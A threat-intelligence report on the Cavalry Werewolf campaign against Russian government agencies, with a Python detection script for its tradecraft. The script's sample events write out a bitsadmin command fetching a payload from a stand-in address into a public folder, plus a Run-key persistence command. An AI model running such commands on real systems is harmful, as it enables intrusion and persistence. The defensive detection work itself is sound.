Cavalry Werewolf Launches Cyberattack on Government Agencies to Deploy Network Backdoor

In July 2025, Doctor Web’s anti-virus laboratory received a critical alert from a government-owned organization within the Russian Federation.

The institution suspected a network compromise after discovering spam emails originating from one of their corporate email addresses.

What began as a routine investigation quickly escalated into the discovery of a sophisticated targeted attack orchestrated by the threat actor group known as Cavalry Werewolf.

The investigation revealed that the attackers’ primary objectives included stealing confidential information and mapping the organization’s network configuration to facilitate deeper penetration into critical infrastructure.

The threat actors employed a conventional yet highly effective attack vector: phishing emails containing malicious attachments disguised as legitimate government documents.

The attachments delivered BackDoor.ShellNET.1, a previously unknown backdoor built on the open-source Reverse-Shell-CS project.

The malware was packaged in password-protected archives, which keeps the executable inside from being scanned by mail gateways, under file names that mimicked official government correspondence, such as “Служебная записка от 16.06.2025” (“Memo dated 16.06.2025”) and “О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe” (“On providing information for preparing a meeting.exe”).

Once executed, the backdoor established a reverse shell connection, granting attackers remote command execution capabilities on the compromised system.

Following successful initial access, Cavalry Werewolf leveraged the Windows built-in tool Bitsadmin to download additional malicious payloads from their command and control servers.

The attackers immediately deployed Trojan.FileSpyNET.5, a file stealer that collects and exfiltrates documents in formats including .doc, .docx, .xlsx and .pdf, as well as image files.

They then installed BackDoor.Tunnel.41, a variant based on the open-source ReverseSocks5 project, which opens a reverse SOCKS5 tunnel so the attackers can reach internal hosts through the compromised machine and run commands on it.

Doctor Web’s investigation uncovered an extensive toolkit employed by Cavalry Werewolf across multiple attack stages.

The initial compromise phase involved diverse malware variants, including BAT.DownLoader.1138 batch scripts, executable trojans like Trojan.Packed2.49708 and Trojan.Siggen31.54011, and multiple backdoor variants including BackDoor.Siggen2.5463 and BackDoor.RShell.169.

Each variant served a specific purpose within the attack chain, and some received their commands through Telegram bots.

During subsequent infection stages, the group deployed advanced backdoors such as Trojan.Inject5.57968, which injected encrypted payloads into legitimate aspnet_compiler.exe processes, and BackDoor.ReverseProxy.1, which established persistent SOCKS5 proxy access.

Notably, Cavalry Werewolf also distributed trojanized copies of legitimate software, including WinRAR, 7-Zip, Visual Studio Code and PDF readers: the modified binaries carried the malicious code but no longer worked as the original application, so a “broken” installer in an incident timeline deserves a closer look.

Network Reconnaissance

Once entrenched in victim networks, Cavalry Werewolf executed systematic reconnaissance activities using legitimate Windows utilities.

The attackers queried user information, enumerated network configurations via ipconfig commands, and tested proxy server connectivity.

They leveraged PowerShell, Bitsadmin, and curl to deliver additional malicious tools, modified Windows registry entries for persistence, and used public directories such as C:\users\public\pictures for staging malware payloads.
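The tradecraft in this section (Bitsadmin, curl and PowerShell downloads, payloads staged under C:\users\public\pictures, registry persistence, and a burst of ipconfig-style reconnaissance from one shell) is visible in ordinary process-creation telemetry. The following is an added example of a rule-based triage pass over such events; it is not code from Doctor Web or this article. The event records are constructed to resemble Sysmon Event ID 1 fields, the command lines, process IDs and the 203.0.113.5 address are illustrative assumptions, and the recon-burst threshold of three distinct commands is an arbitrary choice. Only the staging directory and the tool names come from the report.

```python
"""Rule-based triage of Windows process-creation events for the
Cavalry Werewolf tradecraft described above.

Added example, not code from Doctor Web or the article. Event records are
constructed to resemble Sysmon Event ID 1 fields; command lines, PIDs and
the 203.0.113.5 address are illustrative assumptions, not report indicators."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the new process
    command_line: str
    parent_image: str


STAGING_DIR = r"c:\users\public\pictures"   # staging folder named in the report
RECON_CMDS = ("ipconfig", "whoami", "net user", "net group", "systeminfo", "netsh")
RECON_BURST = 3                              # assumption: 3+ distinct recon commands from one parent


def lolbin_download(ev: ProcEvent) -> bool:
    """Bitsadmin, curl or PowerShell pulling content from a URL."""
    img, cl = ev.image.lower(), ev.command_line.lower()
    has_url = "http://" in cl or "https://" in cl
    if img.endswith("\\bitsadmin.exe"):
        return "/transfer" in cl or "/addfile" in cl
    if img.endswith("\\curl.exe"):
        return has_url and re.search(r"\s-o\s", cl) is not None
    if img.endswith("\\powershell.exe"):
        return has_url and re.search(r"invoke-webrequest|downloadfile|start-bitstransfer|\biwr\b", cl) is not None
    return False


def public_dir_staging(ev: ProcEvent) -> bool:
    """Anything executed from, or writing into, the world-writable Public folder."""
    return ev.image.lower().startswith(STAGING_DIR) or STAGING_DIR in ev.command_line.lower()


def run_key_persistence(ev: ProcEvent) -> bool:
    """reg.exe adding a value under a CurrentVersion\\Run* key."""
    cl = ev.command_line.lower()
    return ev.image.lower().endswith("\\reg.exe") and " add " in cl and "currentversion\\run" in cl


def triage(events):
    """Return {pid: [rule names]}; recon bursts are attributed to the parent pid."""
    hits = defaultdict(list)
    recon_by_parent = defaultdict(set)
    for ev in events:
        for name, rule in (("lolbin_download", lolbin_download),
                           ("public_dir_staging", public_dir_staging),
                           ("run_key_persistence", run_key_persistence)):
            if rule(ev):
                hits[ev.pid].append(name)
        cl = ev.command_line.lower()
        for cmd in RECON_CMDS:
            if cmd in cl:
                recon_by_parent[ev.ppid].add(cmd)
    for ppid, cmds in recon_by_parent.items():
        if len(cmds) >= RECON_BURST:
            hits[ppid].append("recon_burst")
    return dict(hits)


# Constructed sample: a document-named executable extracted by WinRAR (pid 100)
# spawns a shell, which fetches a stager with bitsadmin into the Public folder,
# persists via a Run key, then enumerates the host. Pid 200 is benign admin noise.
LURE = r"C:\Users\u\AppData\Local\Temp\Rar$EXa0.123\Служебная записка от 16.06.2025.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent(100, 50, LURE, '"Служебная записка от 16.06.2025.exe"', r"C:\Program Files\WinRAR\WinRAR.exe"),
    ProcEvent(101, 100, CMD, "cmd.exe", LURE),
    ProcEvent(102, 101, r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer job /download /priority high http://203.0.113.5/u.bin C:\users\public\pictures\u.bin", CMD),
    ProcEvent(103, 101, r"C:\Windows\System32\reg.exe",
              r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /d C:\users\public\pictures\u.bin", CMD),
    ProcEvent(104, 101, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all", CMD),
    ProcEvent(105, 101, r"C:\Windows\System32\whoami.exe", "whoami /all", CMD),
    ProcEvent(106, 101, r"C:\Windows\System32\net.exe", "net user", CMD),
    ProcEvent(200, 60, r"C:\Windows\System32\ipconfig.exe", "ipconfig /flushdns", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, names in sorted(triage(SAMPLE_EVENTS).items()):
        print(pid, names)
```

Running the block flags the bitsadmin fetch (pid 102) twice, for the download itself and for the Public-folder destination, the Run-key write (pid 103) likewise, and the shell (pid 101) for the reconnaissance burst, while the lone ipconfig /flushdns under explorer.exe stays quiet. Grouping recon commands by parent rather than alerting on each one is what keeps that benign event below the threshold; in production the same grouping would add a time window.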

The Cavalry Werewolf campaign demonstrates a sophisticated threat actor group specializing in targeted attacks against government infrastructure.

Their preference for open-source software, extensive backdoor arsenal, and operational security practices position them as a significant persistent threat.

Organizations should implement robust email filtering that treats executables inside password-protected archives as suspicious, endpoint detection that alerts on Bitsadmin, curl and PowerShell downloads and on anything launched from C:\users\public, and network segmentation to limit what a SOCKS5 tunnel through one compromised host can reach.
